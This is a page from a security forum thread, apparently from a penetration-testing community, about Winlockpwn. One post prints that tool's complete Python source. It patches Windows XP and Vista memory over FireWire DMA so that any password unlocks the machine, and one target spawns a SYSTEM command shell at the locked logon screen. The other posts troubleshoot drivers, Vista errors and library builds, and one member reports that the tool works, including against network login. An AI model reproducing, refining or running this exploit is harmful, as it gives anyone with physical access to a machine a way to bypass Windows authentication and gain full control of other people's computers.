Page 3 of 5 FirstFirst 12345 LastLast
Results 21 to 30 of 46

Thread: Tutorial Winlockpwn

  1. #21
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    4

    Default

    williamc,

    I haven't used the code yet as I don't have the equipment at home. I will try it next week when I go to the lab in the university. But I guess that it should work with the drivers I installed, if the signature and the offset are correct. I will post next week when I have some results.

    Atanas

  2. #22
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    I installed those drivers and it didnt resolve the problem. Actually, it made the ipod not even register as a connection in Firewire devices! I attempted to do a system restore but it failed too.

    I'm looking foward to your results!

    William

  3. #23
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    4

    Default

    I performed some tests today but had no luck. I see the ipod in the Device Manager, but if i logout and initiate winlockpwn, it starts searching for the signature, reaches the end offset and outputs an error message. Strange. If I have time tomorrow I'll test further.

    Atanas

  4. #24
    Just burned his ISO
    Join Date
    Aug 2008
    Posts
    2

    Default

    Could the folks that have captured additional (ie, non-ipod) firewire rom csr's post them here for others to test?

    Also, someone posted earlier about alternative ipod drivers that worked for the attack against vista. But the link is dead. Can you describe how to find that driver?

    My interest here is testing how the dma attack vector interacts with bitlocker. I'm currently decrypting a bitlockered vista system to verify Aza's (of Moonloop) patch of the vista msv1_0.dll works when patched by hand. Will post results later.

    Yep, I can confirm that Aza's winlockpwn patch for vista works when manually patching msv1_0.dll. So I'm right where this thread left off before I joined in: finding a firewire driver combination that allows read-write over dma on vista.

  5. #25
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    Updated Winlockpwn to support Vista and XP SP3.

    Code:
    #!/usr/bin/python
    # Windows locked screen remote firewire unlockor
    # Metlstorm 2k6
    # Uh, private use only, not for public distro, kthx.
    
    import sys
    import firewire
    import binascii
    import time
    
    VER=1.6
    VERSTR="Winlockpwn v%s Metlstorm, 2k6. <metlstorm@storm.net.nz>" % VER
    
    # Targets are dicts, with some properties, and one or more phases
    # each phase specifies a signature which can be found at one or more
    # page offsets. When a signature is found the patch is applied at patchoffset
    # bytes from the beginning of the signature. 
    
    targets=[{
    		"name":"WinXP SP2 Fast User Switching Unlock",
    		"notes":"When run against a locked XPSP2 box with FUS on, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.",
    		"phase":[{
    		"sig":"8BD8F7DB1ADBFEC3",
    		"pageoffset":[2905],
    		"patch":"bb01000000eb0990",
    		"patchoffset":0}]
    		},
    		{"name":"WinXP SP2 Unlock",
    		"notes":"When run against a locked XPSP2 box with regular non-fast-user-switching, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.",
    		"phase":[{
    		"sig":"0502000010",
    		"pageoffset":[3696],
    		"patch":"b801000000",
    		"patchoffset":0}]
    		},
    		{"name":"WinXP SP2 msv1_0.dll technique",
    		 "notes":"Patches the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password, which covers logging in, locking, and probably network authentication too! This is the best allround XPSP2 technique.",
    		 "phase":[{
    		 "sig":"8BFF558BEC83EC50A1",
    		 "pageoffset":[0x927],
    		 "patch":"B001",
    		 "patchoffset":0xa5}]
    		},
    		{"name":"WinXP SP3 msv1_0.dll technique",
    		"notes":"Patches the call which decides if an account requires password authentication. Page Offset signature changed from SP2.",
    		"phase":[{
    		"sig":"8BFF558BEC83EC50A1",
    		"pageoffset":[0x81B],
    		"patch":"B001",
    		"patchoffset":0xa5}]
    		},
    		{"name":"Windows Vista msv1_0.dll technique",
    		"notes":"Patches the call which decides if an account requires password authentication. Signature and offsets changed with Vista.",
    		"phase":[{
    		"sig":"8BFF558BEC81EC88000000A1A4",
    		"pageoffset":[0x76A],
    		"patch":"B001",
    		"patchoffset":0xBD}]
    		},
    		{"name":"WinXP SP2 utilman cmd spawn",
    		 "notes":"At the winlogon winstation (locked or prelogin), will spawn a system cmd shell. Start util manager with Win-U, and make sure all the disability-tools are stopped (narrator starts by default). Then run this, wait till it's patched a couple of data-phase things, then start narrator. Enjoy a shell. You can use this with the msv1_0.dll technique as well, and log in. Any time you want to get back to your shell, just lock the desktop, and you'll go back to the winlogon winstation where your shell will be waiting.",
    		 "phase":[
    		 {"name":"Patch code",
    		 "sig":"535689bde8faffffff158810185b898540fbffff39bd40fbffff744e8b8524fb",
    		 "pageoffset":[0x39f],
    		 "patch":"565383c310899de8faffffff158810185b898540fbffff9090909090",
    		 "patchoffset":0x0},
    		 {"name":"Patch data",
    		 "sig":"2f0055004d000000d420185b0539185b0000000053006f006600740077006100",
    		 "pageoffset":[0x9ac, 0x5ac, 0x3ac],
    		 "patch":"63006d0064002e006500780065000000570069006e0053007400610030005c00570069006e006c006f0067006f006e0000",
    		 "patchoffset":0x0,
    		 "keepgoing":True,
    		 }
    		 ]
    		}
    		]
    
    
    start = 0x8000000L
    end   = 0xffffffffL
    chunk = 4096 
    
    print VERSTR
    
    def printTargets(targets):
    	i = 1
    	print " Available Targets:"
    	for t in targets:
    		print " %2d: %s" % (i, t["name"])
    		i+=1
    	print "\nTarget Notes:\n"	
    	for t in targets:
    		print "%s:\n---------------\n%s\n" % (t["name"], t["notes"])
    		
    def usage():
    	print "Usage: winlockpwn port node target [start-end]"
    	print " - Port and node are the firewire port and node numbers. Use businfo to identify your targets port and node numbers."
    	print " - Target should be one of the numbered targets listed below."
    	print " - You can optionally supply a start-end memory range to search for signatures in, useful if you're restarting, or want to limit the upper end of memory (which will otherwise walk up to 4GB without stopping). This understands anything sensible; eg 0-100M, 0xffff-0x1ffff, 1m-, 200k-1GB, -0xffff."
    	print "(Remember that you'll need to use CSR trickery with romtool to talk DMA to windows.)\n"
    	printTargets(targets)
    	sys.exit(1)
    
    if len(sys.argv) < 4:
    	usage()
    
    try:
    	port = int(sys.argv[1])
    	node = int(sys.argv[2])
    	targetno = int(sys.argv[3])
    	if len(sys.argv) > 4:
    		start,end = firewire.parseRange(sys.argv[4])
    		if end == None:
    			end = 0xffffffffL
    except ValueError:
    	usage()
    
    if targetno < 1 or targetno > len(targets):
    	usage()
    
    target = targets[targetno -1]
    
    print "Target Selection:"
    print " Name   : %s" % target["name"]
    print " Notes  : %s" % target["notes"]
    for p in target["phase"]:
    	if p.has_key("name"):
    		print "Phase: %s" % p["name"]
    	print " Pattern: 0x%s" % p["sig"]
    	print " Offset : %s" % p["pageoffset"]
    	print " Patch  : 0x%s" % p["patch"]
    	print " Offset : %d" % p["patchoffset"]
    print "Scanning Options:"
    print " Start  : 0x%x" % start
    print " Stop   : 0x%x" % end
    print " Pagesz : %d" % chunk
    
    for so in p["pageoffset"]:
    	if len(p["sig"]) + so > chunk:
    		print "Uh oh, signature crosses page boundary. This isn't supported :("
    		sys.exit(1)
    	if so + p["patchoffset"] > chunk:
    		print "Uh oh, patch offset crosses page boundary. This isn't supported :("
    		sys.exix(1)
    
    
    
    print "Init firwire, port %d node %d" % (port, node)
    h = firewire.Host()
    n = h[port][node]
    
    print "Snarfin' memories..."
    sys.stdout.flush()
    
    dumppage = False
    won = False
    
    startt = time.time()
    last = 0
    for p in target["phase"]:
    	try:
    		print "Phase: %s" % p["name"]
    	except KeyError:
    		pass
    	signatureoffset=p["pageoffset"]
    	eviloffset = p["patchoffset"]
    	payload = binascii.unhexlify(p["patch"])
    	pattern = binascii.unhexlify(p["sig"]) 
    	eviladdr = None
    	for offset in range(start, end, chunk):
    		now = time.time()
    		if now > (last + 1):
    			last = now
    			print "\rChecking for signature on page at 0x%08x (%dkB) at %d kB/s..." % (offset, offset / 1024, (offset - start) / (now - startt) / 1024 ),
    			sys.stdout.flush()
    
    		for so in signatureoffset:
    			mem = n.read(offset + so , len(pattern))
    			if mem == pattern:
    				print "Found signature at 0x%08x" % (offset + so)
    				eviladdr = offset + so + p["patchoffset"]
    				if dumppage:
    					fo = open("winlockpwn.dumppage.0x%08x" % offset, "w")
    					fo.write(n.read(offset, chunk))
    					fo.close()
    				break
    		if eviladdr != None:
    			won = True
    			print "Setting up teh bomb...",
    			n.write(eviladdr, payload) 
    			print "Donezor!"
    			verify=n.read(eviladdr, len(payload))
    			print "Verified evil: 0x%s" % (binascii.hexlify(verify))
    			if dumppage:
    				fo = open("winlockpwn.dumppage.0x%08x.patched" % offset, "w")
    				fo.write(n.read(offset, chunk))
    				fo.close()
    			if p.has_key("keepgoing") and p["keepgoing"]:
    				eviladdr = None
    			else:
    				break
    
    
    if won:
    	print "You may proceed with your nefarious plans"
    else:
    	print "\nOh noes, you didn't win"
    endt = time.time()
    print "Elapsed time %d seconds" % (endt - startt)

  6. #26
    Member
    Join Date
    Mar 2010
    Posts
    123

    Default

    Thankyou for the guide - however summits gone wrong. [with me this is normal]

    The error i get is :

    bt ~ # cd pythonraw1394
    bt pythonraw1394 # make
    swig -shadow -python -I/usr/local/include/libraw1394 raw1394.i
    /usr/local/include/libraw1394/raw1394.h:1244: Error: Syntax error in input(1).
    make: *** [raw1394.py] Error 1
    bt pythonraw1394 #


    My MakeFile is :
    Code:
    .PHONY=all clean dist
    
    all: raw1394.py _raw1394.so
    
    _raw1394.so: raw1394_wrap.c /usr/local/include/python2.3
            $(CC) -Wall -shared -fPIC -I/usr/local/include/python2.3 -I/usr/include/libraw1394 raw1394_wrap.c  -$
    
    raw1394_wrap.c: raw1394.py
    
    raw1394.py: raw1394.i
            swig -shadow -python -I/usr/local/include/libraw1394 raw1394.i
    
    clean:
            -rm raw1394.py
            -rm raw1394.pyc
            -rm _raw1394.so
            -rm raw1394_wrap.c
            -rm pythonraw1394.tar.gz
    
    dist: clean
            tar czf pythonraw1394.tar.gz -C.. --exclude=\.\* pythonraw1394/Makefile pythonraw1394/README pythonr$
    Have i borked it completly?

    Thanks in Advance

  7. #27
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    Hmm, not sure what your doing wrong. I notice your using Python 2.3. Have you tried following the instructions on the first page with the 2.5 method? Let us know.

    William

  8. #28
    Junior Member
    Join Date
    Aug 2007
    Posts
    63

    Default

    Tested on WindowsXPSP2,SP3 and works fine just got a problem with Vista once start surf the memory just after a few sec will detect the error resource busy .. as previuos posted.

    Been tested also with the Network login with XPSP2 and worked great !

  9. #29
    Member
    Join Date
    Mar 2010
    Posts
    123

    Default

    ok i crossed that hurdle

    now i am at the point where i have to reference /usr/local/include/python2.5 in the other scripts - but i cant see any obvious places to put the reference into

    Its getting late so i will have another look again tomorrow thankyou for the 2.5 pointer

  10. #30
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    Vista will work for a few seconds, at which point you will get a resource busy error. As I previously requested, if anyone has a firewire device other than an Ipod, please use romtool to create a csr file.

    William

Page 3 of 5 FirstFirst 12345 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •